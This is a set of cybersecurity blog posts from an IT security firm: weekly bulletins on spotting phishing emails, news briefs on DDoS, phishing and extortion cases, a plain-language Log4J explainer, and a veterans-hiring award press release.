Netizen Blog and News

The Netizen team sharing expertise, insights and useful information in cybersecurity, compliance, and software assurance.

recent posts

about

  • Netizen Cybersecurity Bulletin (February 14th, 2022)

    Overview

    • Phish Tale of the Week
    • Microsofts Fends off Largest DDoS Attack Ever Recorded
    • Threat Actors Target Tax Software Company Intuit in Latest Phishing Campaign
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting FedEx customers. This email appears to be a notification alerting us that our package could not be delivered due to incomplete information for our physical address. We are then prompted to update our address below. This email contains FedEx’s logo and a convincing message saying update my address, so why not click the link and update details? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, review the sender address thoroughly to see if the email could be coming from a threat actor.
    2. The second warning sign in this email is the frank message about grant money. Messages like this are usually targeted at people in college or around the age to entice them with an offer that is too good to be true. In this case, we are told we can take the right path in life by accepting these grant finances to go back to school.
    3. The final warning sign for this email is the encrypted pdf file attached to the message. Threat actors use encrypted pdfs to delivery malicious payloads normally laced with ransomware or other malware. Never open attachments from unkown parties.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Microsoft Fends off Largest DDoS Attack Ever Recorded

    Cyber-attacks have ballooned to numbers the United States has never seen before in recent months. The FBI estimates that in 2020 U.S. based companies suffered over $5 billion in damages from cyber-attacks. One of the crudest and widely used methods of cyber-attacks is a distributed denial of service or DDoS attack for short. This occurs when an attacker floods a system or server with an insurmountable amount of data, usually from multiple systems, in an effort to overload their target. If done as intended, this attack can knock websites offline for hours, if not days on end, and cause outages for other similar systems.

    Last week Microsoft’s Azure DDoS protection team reported that they had successfully defended against what is likely the largest distributed denial of service attack ever recorded in November of 2021. The attack lasted over 15 minutes with a throughput of 3.47 tbps, a packet rate of 340 million packets per second (pps), and came from over 10,000 different attack sources in ten distinct countries across the globe.

    Microsoft is one of the most prominent tech manufacturers globally, and attacks like this have become the new normal for this U.S.-based company. Reports of a 2.4 terabit per second (tbps) attack in October 2021 and two other large-scale DDoS attacks, each with 2.5 tbps, show just how many times Microsoft’s Azure DDoS protection Team has to put their skills to the test.

    Reports from inside of Microsoft have shown that these DDoS attacks are growing in size and duration. In 2021 57% of DDoS attacks against Microsoft lasted just under 30 minutes. This is a 17% drop from where attacks clocked in 2020. The number of attacks that lasted longer than an hour doubled from 13% in 2020 to 27% in 2021. These more drawn-out attacks often consist of a sequence of numerous short, repeated burst attacks.

    This rise in DDoS attacks is a growing concern for many in the global information security community. Attacks similar to this can be used to overload power or utility systems to cause blackouts, disrupt transit in major metropolitan cities, or even go as far as short-circuiting a nuclear power reactor. Policymakers and board of directors alike need to prioritize bolstering their security postures. Attacks are going to start flooding in from every side, and companies will only have a moment’s notice to react to these attacks. Proactive cyber security policies and dynamic firewall parameters are some of the best ways to fight against these DDoS attacks.

    To read more about this article, click here.

    Threat Actors Target Tax Software Company Intuit in Latest Phishing Campaign

    Eager to get your tax refund this year? Unfortunately, so are cyber criminals. Tax company Intuit is warning their customers that an ongoing phishing campaign is targeting their users. The subject line reads “Critical: Action Required (TXPO99497)”, with the email displaying an “account disabled warning” and that users must remedy this issue within 24 hours. Users are then told that “this is the result of a recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season. The message is then concluded with a malicious link at the bottom of the message for users to “restore their accounts”.

    A spokesperson for Intuit declared, “the sender is not associated with Intuit, is not an authorized agent of Intuit, nor is their use of Intuit’s brands authorized by Intuit.”

    Intuit declined to comment on what happens when users click the malicious link, however most phishing campaigns utilize similar links to ensnare their targets with malware or ransomware. If you have already clicked the link, some necessary steps you can take to protect yourself are as follows. Delete any recent downloads from unknown sources, use up-to-date antivirus software and scan your computer/laptop, change your passwords to any accounts that were signed in when you clicked the initial link.

    Consumers need to constantly be on the lookout for phishing attacks as threat actors become more crafty with their attacks. This recent phishing campaign using Intuit as a guise relies on users rushing to get their taxes done during a busy time of the year. Always be sure to check the sender address and contents of every email you receive to make sure it’s not a phishing trap. Attackers often utilize urgent messages such as “fix account within 24 hours” or “click the link immediately to resolve this issue” in an attempt to create panic and illicit a fast response out of their targets. Thoroughly inspect any suspicious-looking emails, and discard them properly when using your email service.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Netizen Cybersecurity Bulletin (January 11th, 2022)

    Overview

    • Phish Tale of the Week
    • How Remote Work has Impacted Cybersecurity
    • Are Medical Devices at Risk of Cyber Attacks?
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting FedEx customers. This email appears to be a notification alerting us that our package could not be delivered due to incomplete information for our physical address. We are then prompted to update our address below. This email contains FedEx’s logo and a convincing message saying update my address, so why not click the link and update details? Unfortunately, there are plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, check all suspicious emails from companies against previous correspondences you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the incomplete greeting. The email starts off with Dear [Name] instead of an actual name. This is a telltale sign of a spam email. Most outside threact actors will lack the basic information to create a legitimate looking email. Usually, the greeting would have your specific first and last name in the beginning to show who the company is communicating with.
    3. The final warning sign for this email is the inconsistency in the messaging. First we are told to update our physical address. Then we are told to update our personal address. Finally we are told to “update my address” below. Most companies will use consistent messaging and refer to account changes that need to be made in the same fashion each time. This phyiscal address vs personal address vs update my address is an immediate red flag.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For FedEx-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    How Remote Work Has Impacted Cybersecurity

    The pandemic has forced many companies to abruptly accept work from home for the majority of their workforce as the new normal. Once bustling offices have been reduced to skeleton crews of a handful of employees or, in many cases, remain completely empty. This switch has been a blessing for some companies allowing them to reduce fixed costs such as real estate and even broadened their searches for new job candidates now that geographical limitations aren’t a factor.

    Unfortunately, some severe problems have begun to plague many organizations relying on remote work policies. Before the start of the pandemic, remote work was seldom used in most companies. This lack of experience and a rapid switch to remote work created a security nightmare for many teams. Many of these businesses lacked the infrastructural and cultural policies to adapt to remote work environments fully. Did you know only 38% of companies had a cybersecurity policy in place before the pandemic, and only a third of these businesses had policies on remote work? This created a perfect storm for cybercriminals, with cyber attacks almost quadrupling during the pandemic targeting small and medium-sized businesses, hospitals, enterprise-grade organizations, and schools alike.

    One of the leading causes of headaches for companies suffering onslaughts of cyber attacks was the lack of planning. Organizations quickly adapted to the new normal of remote work but were unable to create cybersecurity policies beforehand to govern how these devices communicate with each other and are used. This lack of forethought also affected the tools or lack thereof that companies could use to help better monitor network traffic, secure firewalls, or detect vulnerabilities within their environment. Even companies who did have state-of-the-art equipment in the office were now rendered helpless and had to rely on the network security of their employees since they were no longer under the office safety net of a well-programmed firewall.

    Another major issue that has affected companies everywhere is an overall lack of cybersecurity education. Most cyber attacks start with an unsuspecting employee clicking on a malicious link or downloading a file they shouldn’t have. Organizations need to be quick to adopt a culture of hyper-vigilance when discussing security with their employees. The best way to approach this is through an abundance of caution. Employees are better served asking for help or if an attachment looks suspicious than mistakenly clicking on a malicious link. Companies that prioritize training their employees to ask questions about security and check with their IT admins first will immediately notice a decline in risk.

    Overall, remote work has brought many incentives to organizations that implement it correctly. With it, outside threat actors will use this increased attack surface to target more companies and employees to extort. The best way to move forward is to review your cybersecurity policies and update them accordingly for a remote work environment. Make all employees involved in a culture of security at your company.

    To read more about this article, click here.

    Are Medical Devices at Risk of Cyber Attacks?

    In 2017 the first ransomware assault on networked medical equipment occurred when the ransomware strain WannaCry targeted radiological tools in several hospitals. This attack caused multiple hospitals to postpone cancer treatments until they could identify the source of the ransomware affecting their network. This example perfectly illustrates how cyber attacks can disrupt the healthcare industry and impact patients’ care. However, the quality of care is not the only thing disrupted during cyber attacks.

    Hospitals house some of the most comprehensive PHI (patient health information) databases globally. These records include medical history, address, age, social security numbers, and insurance specifics that can lead to nightmares for unsuspecting patients when in the wrong hands. Since more hospitals have become interconnected with a litany of medical devices communicating with each other over the network, securing the transfer of this information through the cloud is paramount.

    Securing external medical equipment is imperative to providing quality health care and protecting patient information. Everything from insulin pumps to ventilators to security cameras, and RFID readers must be secured to ensure hackers do not have easy entry points. The interconnectivity of devices in a hospital has created a massive attack surface for outside threat actors to exploit. IT staff need to be well trained in identifying, upgrading, and patching vulnerable systems and devices to ensure they are safe from malicious cyber criminals.

    The pandemic has caused a significant strain on health care organizations across the country. The increase in patients has caused issues for primary care providers and created a perfect storm for outside threat actors. Hackers are using the unrest created from surges of patients at hospitals to target health care networks and infect them with ransomware. Law enforcement and government agencies have been unable to stop the escalation of cyber attacks against hospitals, leaving on-site IT admins and medical device security as the last line of defense.

    In conclusion, medical device manufacturers need to focus on the security of their devices before they are released into the market. Vulnerable devices cause a wide array of problems for health care institutions and can be actively exploited by cyber criminals. At the same time, hospitals need to prioritize enabling IT staff to monitor these devices and consider what devices could become attack vectors in their environment.

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Log4J: The Minecraft found, Java fueled nightmare.

    Log4J: The Minecraft found, Java fueled nightmare.

    On December 9th, the greater information security community had its world turned upside down when a newly uncovered zero-day vulnerability was found in Apache’s Java logging library Log4J. Within hours of this news, every major software company was in disaster mode, attempting to determine how their products were affected and how to fix a patch could be released. Jen Easterly, director of the U.S Cybersecurity and Infrastructure Security Agency (CISA), stated this is the most severe security flaw she has seen in her career, but just how bad is this vulnerability?

    Why is this so bad?

    The Log4J vulnerability is being tracked as CVE – 2021-44228 by MITRE, with this critical vulnerability’s severity set at CVSS 10/10. This vulnerability is unlike anything researchers have ever seen before, with the size and scope affecting millions of applications across the world. Log4J is a section of code that assists software applications in tracking past activities. Companies use this component when developing new applications for a variety of reasons. The code is widely used due to its efficiency and open-source nature, allowing for cost savings on the developers’ end. Earlier this December, a Minecraft community forum discovered the vulnerability after a person sent a remote code exploitation (RCE) to a friend’s Minecraft server. Unfortunately, the RCE worked, and the same method of compromise can be duplicated and used against millions of applications that utilize that same line of code.

    What does this mean?

    Imagine a specific type of bolt attached to the tire of a car suddenly becomes loose and stops working. Changing out that set of bolts on one car is easy but think of how difficult it would be to find every car that uses that ineffective type of bolt. That is what the information security community is dealing with, with Log4J. By injecting a malicious line of code into the logs, an outside threat actor can gain total access to the affected system, allowing them to create botnets, mine cryptocurrency, or distribute ransomware to other connected systems.

    This vulnerability is terrifying for so many companies because of the ubiquity and triviality of this issue. The line of malicious code needed to exploit the vulnerability only runs 12 characters long. Attackers that generally wouldn’t have the skills to pull off a remote code exploitation on a vulnerable application now have one of the most accessible attack vectors to unpatched systems.  This, coupled with the widespread use of the open-source code in the vulnerability, means that millions of applications are susceptible to attacks from everyone, from nation-state threat actors to lower-level hackers.

    What is the solution?

    Hackers will have to deliver a line of malicious code to take advantage of vulnerable applications running Log4J. One of the easiest ways to deliver this code is through phishing campaigns. Be sure to keep an eye out in the coming weeks for any suspicious emails prompting you to click on a link or open any attachments. Always look to authenticate the sender before replying to any email chains, if the address looks suspicious, do not reply. Another step users can take to stay protected is routinely checking for updates on frequently used applications like your internet browser, mobile applications, and video games. Developers are hard at work creating patches to this security vulnerability. Promptly install all updates and keep an eye out for companies giving any additional advice or directives to follow to help secure your infrastructure.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

    Questions or concerns? Feel free to reach out to us any time – https://www.netizen.net/contact

  • Netizen Cybersecurity Bulletin (December 2nd, 2021)

    Overview

    • Phish Tale of the Week
    • Ubiquiti Developer Charged With Extortion
    • IKEA Fights Ongoing Phishing Campaign
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting Amazon customers or just someone who doesn’t check their email rigorously. This email appears to be a notification alerting us that our email is missing from Amazon and a package was supposed to be delivered today. This email contains Amazon’s branding and a convincing message saying to reply with the correct shipping address, so why not click the link and update details? Unfortunately, there’s plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, check all suspicious emails from companies against previous correspondences you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email was the lack of authentication. The message says a delivery was scheduled for today, but normally Amazon fulfills their shipping orders using UPS, FedEX or USPS. While Amazon will normally alert you of a missed delivery, the lack of an additonal email from the shipping company is cause for suspicion.
    3. The final warning sign for this email is the callouts at the bottom. This message says to “update detals”. Brief messaging is normally used in scams like this to attract people to just read what they say and click as fast as possible. One easy way to spot a scam email is to reference previous emails you’ve received from the company. When compared to other correspondences from Amazon, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Venmo-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    Ubiquiti Developer Charged With Extortion

    Following a January 2021 data breach, technology vendor Ubiquiti Inc. has uncovered the source behind the incident. On Wednesday in Oregon, federal prosecutors arrested Nickolas Sharp, a former senior developer at Ubiquiti. Sharp stands accused of stealing gigabytes of confidential, proprietary data from his former employer and then trying to extort Ubiquiti for $1.9 million to return the files. Sharp worked at the New York-based company from August 2018 to April 2021, acting as an unidentified whistle-blower claiming that a hacker was responsible for the January data breach.

    Prosecutors claim Nickolas Sharp applied for a different job at another tech company in December of 2020. He then abused his access privileges to steal Ubiquiti data via Uqibuti’s AWS server and the company’s GitHub accounts. Employees inside of Ubiquiti uncovered unusual download traffic on December 28, noting a user had leveraged internal company credentials and a VPN connection to mask their actual location. This prompted the tech company to investigate the suspicious activity further.

    On January 7, a senior Ubiquiti employee received a ransom email sent to them through an IP address with the same VPN used to download the stolen data. The email explained that internal and external Ubiquiti data had been stolen, and the ransomer demanded 25 bitcoin in exchange for the return of the data. The assailant then offered to identify a “backdoor” they had left in the Ubuqiti environment for an additional 25 bitcoin. Prosecutors believe Nickolas Sharp sent this ransom while working on the remedial team tasked with investigating the breach, bringing him closer to the crime and giving him a chance to stifle any efforts to uncover the breach’s source.

    Federal investigators claim that while attempting to download the data, Sharp’s internet connection briefly failed, disrupting his VPN connection and exposing his internet address. Sharp maintains his innocence and claims the VPN subscription tying him to the crime must have been purchased by someone else using his PayPal account.

    Prosecutors are charging Nickolas Shark with intentionally damaging protected computers, making false statements to the FBI, transmitting interstate communications with the intent to extort, and wire fraud. If found guilty Sharp faces a maximum sentence of 37 years in prison.

    Following the announcement of this data breach in a March disclosure, Ubiquiti’s stock tumbled 20%, erasing $4 billion in market cap.

    To read more about this article, click here.

    IKEA Fights Ongoing Phishing Campaign

    While many Americans were out shopping on Black Friday, Swedish design company IKEA was busy fighting an ongoing internal phishing campaign rather than hoards of shoppers. Reports from inside IKEA show that a reply-chain email attack is being utilized to install malware on unsuspecting employee devices through malicious download links hidden in documents. This attack differs from most phishing campaigns by using legitimate company email accounts to hijack email chains and distribute ransomware and malware.

    After detecting this attack, IKEA has been on high alert and has urged all employees to use caution when opening or replying to any emails in their inboxes. At this time, official IKEA accounts, distributors, suppliers, and other organizations with ties to IKEA are considered compromised. IKEA’s internal security team has detected numerous malicious emails sent to their employees from most of their business partners.

    IIKEA security teams have warned employees that the reply-chain emails have seven-digit codes and an example email attached to all emails. Employees have also been advised not to open any suspicious emails, regardless of the sender, and immediately report them to the IT department.

    On Tuesday, an IKEA spokesperson was pressed on this matter, asking if the phishing attack had been contained. He responded by saying, “IKEA takes this matter very seriously. We continue to monitor to ensure that our internal defense mechanisms are sufficient. Actions have been taken to prevent damages, and a full-scale investigation is ongoing”. 

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Netizen Cybersecurity Bulletin (November 19th, 2021)

    Overview

    • Phish Tale of the Week
    • CMMC Halted CMMC 2.0 On The Horizon
    • Global Supply Chain At War Against Dark Web Cybercriminals
    • How can Netizen help?

    Phish Tale of the Week

    Phishing attempts can often target specific groups that can be exploited by malicious actors. In this instance, we see a phishing scam targeting unsuspecting employees that may be expecting an invoice to be paid or just someone who doesn’t check their email rigorously. This email appears to be a notification saying $500 has been sent to our Venmo account. This email contains Venmo’s branding and a convincing message saying to complete the necessary steps to finish the process, so why not click the link?. Unfortunately, there’s plenty of reasons not to click that email right away.

    Take a look below:

    1. The first red flag on this email is the sender address. Always thoroughly inspect the sender address to ensure its from a trusted sender. In the future, check all suspicious emails from companies against previous correspondences you’ve received and make sure the sender address is the same.
    2. The second warning sign in this email is the lack of consistent messaging. The image in the email shows that I $500 has been sent to my account, but there is no other information available. Normally, when you recieve money on Venmo a reciept is sent to your inbox with the party that sent the money and the total amount. In this case, there are no further details on this payment.
    3. The final warning sign for this email is the callouts at the bottom. This message says to “accept money”. Brief messaging is normally used in scams like this to attract people to just read what they say and click as fast as possible. One easy way to spot a scam email is to reference previous emails you’ve received from the company. When compared to other correspondences from Venmo, this email immediately looks different.


    General Recommendations:

    A phishing email will typically direct the user to click on a link where they will then be prompted to update personal information, such as a password, credit card, social security, or bank account information. A legitimate company already has this sensitive information and would not ask for it again, especially via email. 

    • Scrutinize your emails before clicking anything. Have you ordered anything recently? Does this order number match the one I already have? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
    • Verify that the sender is actually from the company sending the message.
    • Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc. A legitimate company will never ask for PII via instant message or email.
    • Do not give out personal or company information over the internet.
    • Do not click on unrecognized links or attachments. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.

    Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action should be vetted thoroughly to determine whether or not it is a scam. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Fix your account now” may draw the question “What is wrong with my account?” and prompt you to click a suspicious link.

    For Venmo-specific recommendations and tips check out this link to their fraud detection center here.

    Cybersecurity Brief

    In this week’s Cybersecurity Brief:

    CMMC Halted CMMC 2.0 On The Horizon

    Earlier this month, sources from inside The Pentagon summarized their changes for the Cybersecurity Maturity Model Certification (CMMC) program. These changes come almost a year after the initial idea of CMMC was proposed to members of the DoD supply chain. CMMC is made up of security requirements that all DoD vendors and suppliers must adhere to better protect the flow of data and information and increase their security posture. The Department of Defense has halted all official audits and implementations of this framework, pending the release of new changes later this year.

    The goal of this program was to require every defense contract that comes in contact with certain controlled and unclassified information to undergo a third-party audit to determine their compliance with the controls outlined in the original release of the Cybersecurity Maturity Model Certification. The federal government had plans to pilot this certification with multiple internal programs, but now those plans have been stalled. According to The Pentagon, the previous requirements and guidelines from CMMC will be rolled into CMMC 2.0 with hopes of discussion and collaboration within the industry to help streamline this process.

    The focal point of CMMC was that Pentagon officials believed the current system of defense contracts being allowed to self-attest their compliance with cybersecurity standards from the National Institute of Standards and Technology (NIST) was not working. This was further confirmed after the U.S saw a nationwide increase in cyberattacks at the beginning of and through most of 2021.

    The original CMMC guidelines established five levels of security for vendors to meet with specifics to which level they needed based on the level of data they process/possess. CMMC 2.0 has proposed removing levels two and four from the standard. Additionally, all level one suppliers can self-attest to their cybersecurity readiness. The next level (previously level three) would be split into priority and non-priority acquisitions, allowing priority to opt-out of an independent third-party assessment. The rules for level three (previously level five) have yet to be released.

    CMMC 2.0 is also rumored to remove additional controls that were added last year in CMMC’s initial run and will instead rely solely on NIST’s 800-171 controls. In accordance with this, CMMC 2.0 will now accept plans of actions and milestones (PoAMs), which had initially been ruled out last year. The final set of changes and requirements for CMMC 2.0 have yet to be released but are due out by the end of the year.

    To read more about this article, click here.

    Global Supply Chain At War Against Dark Web Cybercriminals

    Many Americans have been suffering supply chain shortages for months now. Whether it is toilet paper, a new PlayStation 5, or a pair of winter boots, goods are not as easy to get your hands on as they once were. Economists have blamed these shortages on many issues surrounding the pandemic and state of the global economy. To make matters worse, supply chain vendors are now faced with an onslaught from cybercriminals on the dark web selling sensitive information that could compromise these companies.

    Cyber intelligence firm Intel 471 recently reported that dark web traffic has spiked with user credentials from ground, maritime, and air cargo transport vendors being sold on underground marketplaces. These criminals have leveraged vulnerabilities in virtual private networks (VPNs), remote desktop protocol (RDP), and other products like Citrix and SonicWall to exploit these organizations.

    Intel 471 researchers reported, “We’ve witnessed ransomware attacks on the shipping industry throughout the year, which has undoubtedly put a constraint on companies that are already stretched thin due to the pandemic.”

    By the beginning of 2021, the four largest global maritime shipping companies had become victims of recent cyber-attacks, leaving many wondering how. A deeper dive into the dark web uncovered that many of these companies were being advertised on underground forums. In October 2021, cybercriminals on one of the forums stated they had access to a U.S based freight company and could provide administrator access for multiple computers on their network. In August, just months before, an unknown threat actor with ties to the Conti ransomware gang had claimed to have similar access to a U.S-based transportation management firm.

    These attacks are hindering shipping operations across the globe, and vendors need to take notice immediately. As more focus is put on suppliers to move goods worldwide, companies must increase their cybersecurity posture. These recent attacks have proved they are lucrative targets to cybercriminals, and they won’t stop till there is pushback.  

    For more information check out the rest of the article here.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. 

    We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type. 

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans. 

  • Netizen Corporation awarded HIRE Vets Platinum Medalion for the 4th year in a row.

    Netizen Corporation awarded HIRE Vets Platinum Medalion for the 4th year in a row.

    Allentown, PA: Netizen Corporation, an ISO 27001:2013, ISO 9001:2015, and CMMI Level 3 certified provider of cybersecurity and related solutions for defense, government, and commercial markets, has once again for the fourth year in a row received a HIRE Vets Platinum Medallion award from the U.S. Department of Labor for the hiring, retention, support, and training of military veterans and their families. This is the highest level of award available under this program and is given to select companies demonstrating superior commitments to veteran employment and the overall military/veteran community. Netizen employs a significant percentage of veterans nationwide to support federal, commercial, and government contracts while also providing free training, college scholarships, and paid internships to help veterans and military families obtain careers in high-demand technical fields such as cybersecurity.

    The HIRE Vets Medallion program was established under the Honoring Investments in Recruiting and Employing American Military Veterans Act or HIRE Vets, Act signed into law on May 5, 2017, to recognize employers who hire, retain, and support military veterans. The Platinum Medallion is the highest level of award a company can receive for this program and the citation states that “[Netizen] has demonstrated a model of patriotism worthy of praise as well as a recognition of the value veterans bring to the workplace.”

    “At Netizen we take pride in our military service, and are heavily involved in the veteran community providing scholarships, internships, training, education, and support to organizations in the Lehigh Valley region and beyond. As a veteran-owned company, we have always been keenly aware of the benefits and skills that military veterans bring to an organization and offer programs to help them enter and thrive in technical career fields by working with colleges, service organizations, and other groups to continuously expand our award-winning military and veteran support programs,” said Michael Hawkins, Netizen CEO, and a U.S. Army veteran.

    About Netizen Corporation:

    America’s fastest-growing cybersecurity firm, 2nd fastest-growing Veteran-owned company, and 47th fastest-growing private company overall according to the 2019 Inc. 5000 list of the nation’s most successful businesses, Netizen provides specialized cybersecurity solutions for government, defense, and commercial markets. They also develop innovative products such as the award-winning Overwatch Governance Suite.

    The company, a certified Service Disabled Veteran Owned Business (SDVOSB), is based in Allentown, PA with additional locations in Virginia, South Carolina, and Florida. In addition to having been one of the fastest-growing businesses in the US, Netizen has also been named a national “Best Workplaces” by Inc. Magazine and has received the US Department of Labor HIRE Vets Platinum Medallion award for veteran hiring, retention, and community involvement four years in a row. Learn more at Netizen.net.

    POINT OF CONTACT
